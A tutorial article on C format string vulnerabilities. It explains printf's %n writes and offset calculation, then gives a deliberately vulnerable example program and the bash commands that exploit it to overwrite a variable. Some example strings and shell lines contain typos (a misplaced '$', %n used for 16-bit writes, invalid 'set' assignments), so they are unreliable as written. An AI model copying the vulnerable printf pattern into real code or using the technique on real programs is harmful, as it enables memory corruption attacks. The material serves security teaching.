Format String Vulnerabilities
Table of Contents:
Introduction
A format string vulnerability is a vulnerability in which a malicious user, Vladimir, will be able to redirect code execution or alter data in one way or another by misusing a (small) mistake by an unknowing programmer.
These vulnerabilities lie within a series of C runtime functions which process data based on a format string, the most common functions being printf()[1] and scanf()[2].
Format String 101
A format string is a definition of what data the programmer wants to read or write to a certain stream (stdin[3], stdout[3], stderr[3], files, sockets, logs, …). These format strings can be very powerful, when used in the wrong way they might overwrite too much data, resulting in an “undocumented feature” [4] (“It’s not a bug! It’s an undocumented feature!”).
I will start with format string vulnerabilities related to printf()[1]. printf() is declared as:
int printf(const char *fmt, ...);
The first argument accepts a format string, specifying the data that follows (if any). The “…” in the declaration of printf() means that any amount of parameters can be passed onto printf(), because the format string will define which parameters are used. First we will learn more about the format string and how it is represented (atleast, which parts matter to us), then we will see a few examples.
printf() will do nothing special with the format string until a % token is found, this is the “special” token that indicates that data from the stack (one of the parameters given to the function) may be used.
When this token is followed by another % then nothing interesting will happen and a single % is written to the stream. There is a few common “conversion specifiers”, ie: c for an 8bit signed character, s for a zero-terminated string, d for a 32bit signed decimal etc.
// Writes: "Hello %" printf("Hello %%"); // Writes: "Hello world!" printf("Hello world!"); // Writes: "Number: 1337" printf("Number: %d", 1337); // Writes: "Format Strings" printf("%s %s", "Format", "Strings");
Now for some more interesting things, by using a so-called “field width” we can specify the minimum amount of bytes to write to the stream, no matter how long the actual representation of the converted value is. This field width is specified as integer after the % token and before the conversion specifier, when the field width exceeds the length of the converted value then it will (by default) pad the values with spaces on the left. Some examples:
// Writes: " A" printf("%12c", 'A'); // Writes " Hello!" printf("%16s", "Hello!");
In other words, we can specify the length the format string will write, this is very important as we will see now. There is a special conversion specifier which is not treated as input, but output — the n conversion specifier. The n conversion specifier obtains the amount of bytes that have been written so far and writes them as 32bit integer to the corresponding argument on the stack, let’s see some more examples.
int n; // n will contain 12 after this call printf("%12c%n", 'A', &n); // n will contain 16 after this call printf("%16s%n", "Hello!", &n);
There is also two slightly different variations on this conversion specifier by specifying a so called “length modifier”, we are only interested in the length modifier h, this length modifier turns a 32bit integer into a 16bit integer. So if we want to overwrite a short int (a 16bit integer) somewhere but we cannot modify the contents behind it for some reason, then we will want to use %hn. Another length modifier exists, namely %hhn, the second h indicates that we do not want a 16bit integer, but an 8bit one. So basically if you want to overwrite a single byte somewhere in memory (for example a character in a string) then %hhn is the way to go.
Before we continue with examples, there is one more attribute to the conversion specifier that will give us even more control, the “parameter index” modifier. The parameter index allows us to specify which parameter we want to retrieve data from or (in the case of the %n conversion specifier) write data to. This parameter index can be set by inserting m$ directly after the % token, m being the index (starting by 1) of our parameter, some examples!
// Note that the parameter indices are swapped! // Writes: "Strings Format" printf("%2$s %1$s", "Format", "Strings"); // First writes 41 spaces, followed by the lowest 8 bits of // the address of n as character, then writes the value 42 to n. // Also note that we reuse the "&n" parameter. int n; printf("%42c%1$n", &n);
Calculating Offsets
We have now seen the power of printf(), however we are missing one thing which is specific to the scenario in which you are exploiting, the address to overwrite. We covered how to write n bytes to the address specified in the parameter with index m. However, a small drawback is.. the implementation of printf() allocates as much memory as you specify in your n, besides that, if you write to a file (or even worse, a socket) this might be a bottleneck. But we can come up with solutions to this, of course. For this example we will assume that we can control two parameters, respectively address and address+2 (in other words, the address we want to overwrite is on the stack, as well as this address + 2, 2 being the size of a short int). We will calculate how many bytes we have to write in order to obtain the lower 16 bits of the value n we want to write, we will write this amount of bytes, following a 16bit write (%hn). What’s left is that we have to calculate the amount of bytes to write for the higher 16 bits, followed again by a 16bit write. Writing the higher 16 bits is a bit more tricky, since we have already written x bytes (x being the value of the lower 16 bits). We will calculate the amount of bytes to write for the higher 16 bits like this:
// lower 16 bits of the value "n" int lower_16bit = ???; // higher 16 bits of the value "n" int higher_16bit = ???; // we want to write higher_16bit bytes // we have already written lower_16bit bytes // solution: subtract lower_16bit from higher_16bit // make sure to keep a positive integer (by adding 0x10000 // which is one more then the biggest 16bit integer) // followed by an and statement, we don't want to write // 0x10000 bytes for nothing (which is possible otherwise) // ie: if higher_16bit equals lower_16bit then we don't // have to write any bytes at all, but the +0x10000 would // make us write 0x10000 bytes, so we cut them off again. int amount = (higher_16bit - lower_16bit + 0x10000) & 0xffff;
So basically, if address and address+2 are on the stack, we can write any value to any address, yay! Let’s see an example of how we would come up with such format string.
// We assume that the value "address" is the 5th parameter // And that the value "address+2" is the 6th parameter // We want to write the value n=0xdeadf00d to "address" // Lower 16bits of n = 0xf00d = 61453 // Higher 16bits of n = 0xdead = 57005 int amount_lower = 61453; int amount_higher = (57005 - 61453 + 0x10000) & 0xffff; // amount_higher = 61088 // resulting in the following format string: // (note the parameter indices for both addresses) const char *fmt = "%61453c%5$n%61088c$6n";
Hardcoding Addresses
We have just seen a working format string exploit, however we are still missing one thing.. the addresses, it’s unlikely that they will be in the parameter stack just like that. So we will have to put them there ourselves. Getting the address in the parameter list can be a little bit tricky.. However, if the format string is located on the stack it shouldn’t be that hard to find it, let’s find out using an example:
// fmtstr1.c corresponds with the binary ./fmtstr1 #include <stdio.h> #include <string.h> static volatile int magic_value = 0; void process(const char *str) { printf(str); } int main(int argc, char *argv[]) { char str[128]; strncpy(str, argv[1], sizeof(str) - 1); process(str); if(magic_value == 0xdeadf00d) { printf("nice job!\n"); } }
This is a very simple example of a format string vulnerability, ie: printf() accepts a string that we control completely. Using a relatively simple bash expression on the commandline we can quickly figure out which parameter indices contain our address and address+2, which we will be hardcoding in the format string itself. For this example we will assume that the global value “magic_value” remains at address 0×8049644 and we will obviously want to write the value 0xdeadf00d to it, in order to get our beloved printf(“nice job!\n”). So let’s find out what the parameter indices are.
# we look for values 0x44332211 and 0x88776611 on the stack # we will print the parameter index and corresponding value # for each index in the range 1 to 256. values found using # this method might differ based on compiler options, etc. # set the addresses to an environment variabele # (address are little-endian) $ export ADDRS=$'\x11\x22\x33\x44\x11\x66\x77\x88' # this for loop will iterate 256 times, execution trace will be: # ./fmtstr1 $'\x11\x22\x33\x44\x11\x66\x77\x88 1 %1$p\n' # ./fmtstr1 $'\x11\x22\x33\x44\x11\x66\x77\x88 2 %2$p\n' # ./fmtstr1 $'\x11\x22\x33\x44\x11\x66\x77\x88 3 %3$p\n' # ... snip ... $ for i in `seq 1 256`; do ./fmtstr1 $ADDRS' '$i' %'$i$'$p\n'; done ... snip ... .. garbage .. 11 0xbfffdd24 .. garbage .. 12 0x44332211 .. garbage .. 13 0x88776611 .. garbage .. 14 0x08048100 ... snip ... # actually the values were also found further in the stack because they # are also stored in argv[] but we are better off ignoring those
(Little Endian[5]). You can see that parameter index 12 contains our first address (0×44332211) and parameter index 13 our second address (0×88776611). This is very good news, because now we can finish our exploit!
# set the address of the lower 16 bits of magic_value $ set ADDR1=$'\x44\x96\04\x08' # set the address of the higher 16 bits of magic_values $ set ADDR2=$'\x46\x96\04\x08' # we will prepend our format string with $ADDR1 and $ADDR2 # this will write 8 bytes to our stream, so we have to take # this into account when writing the amount_lower bytes # (note: we take amount_lower and amount_higher which we # calculated earlier), so basically we have to subtract # amount_lower by 8. Time for some exploitation! # btw, amount_lower = 61445, amount_higher = 61088 $ ./fmtstr1 $ADDR1$ADDR2'%61445c%12$n%61088c%13$n' nice job!
Nice! We have just overwritten the magic_value with the value 0xdeadf00d.
References
- printf(3) - Linux man page
- scanf(3) - Linux man page
- Standard Streams - Wikipedia
- Undocumented Feature - Wikipedia
- Little Endian - Wikipedia